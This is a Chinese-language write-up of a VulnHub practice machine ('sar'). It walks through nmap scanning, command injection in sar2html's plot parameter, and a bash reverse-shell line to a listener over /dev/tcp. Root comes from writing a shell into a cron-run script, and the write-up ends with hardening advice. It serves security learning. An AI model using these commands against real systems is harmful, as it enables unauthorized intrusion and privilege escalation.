声明#

1. 本文为个人跟随b站up主红队笔记学习vulnhub的sar靶机的复现通关记录，旨在分享靶机和记录学习心得体会，讲解若有谬误之处欢迎指正。
2. 该靶机下载地址为’https://vulnhub.com/entry/sar-1,425/‘

渗透流程#

1. 在vmware部署靶机并开机后，打开kali对靶机进行信息收集，使用nmap执行nmap -sn 192.168.130.0/24(请替换成你的网段)进行主机发现，发现图中的192.168.130.130为靶机。（192.168.130.128为我的kali虚拟机的地址）并进行端口发现，执行nmap --min-rate 10000 -p- 192.168.130.130，并对开放端口记录用于后续渗透，仅发现80端口。
2. 对端口进行详细扫描，执行nmap -sT -sV -sC -O -p80 192.168.130.130，得到端口详细服务内容和系统版本，执行nmap --script=vuln -p80 192.168.130.130用脚本扫一下漏洞。
3. 通过脚本扫描出的robots.txt中获得了如下信息，可能是页面。
4. 成功访问到该页面。
5. 通过searchsploit搜索漏洞，先下载txt文件看看介绍。
6. 简单来说，在对应url拼接plot=?command执行，在下面的select host可以看到命令执行结果。
7. 例如执行whoami，下拉发现www-data，证明漏洞存在。
8. 构造反弹shell的txt格式bash -c "/bin/bash -i >& /dev/tcp/192.168.245.136/1234 0>&1"，后面利用远程命令执行在我们搭建的服务器上下载该txt文件，保存为php文件。
9. 拼接如下url，并访问。
10. 打开kali的监听，访问shell.php，成功获取初始shell。

提权过程#

1. 简单搜寻，有自动任务，内容如下。
2. 了解自动任务逻辑，权限属于root的finally.sh，每五分钟执行write.sh，write.sh属于www-data用户，尝试修改文件写入反弹shell提权。
3. 提前打开nc监听1234端口，等待自动任务执行，稍作等待看到反弹回root的shell了，提权结束。

其它补充与收获总结#

1. 本次利用漏洞为CVE-2025-34030，是一个高危漏洞，通过查看github上sar2html项目原码，猜测index.php相关模块对用户可修改的plot参数没有进行过滤，如下图一，直接将plot参数获取，并且拼接系统指令执行，未作转义和过滤处理，而这样构造payload，如下图二所示，相当于执行/sar2html -r ;command，且该执行结果刚好会被php文件回显到页面上供用户查看，这是十分危险的漏洞，影响版本为3.2.2及以前版本。
2. 防护思路：

• 禁用危险函数：disable_functions = exec,system,shell_exec,passthru。
• 对传入所有参数进行严格过滤，对传入数据做到零信任。
• Web目录设置正确的权限：chmod 755 /var/www/html，从而防止其它用户写入shell等恶意文件。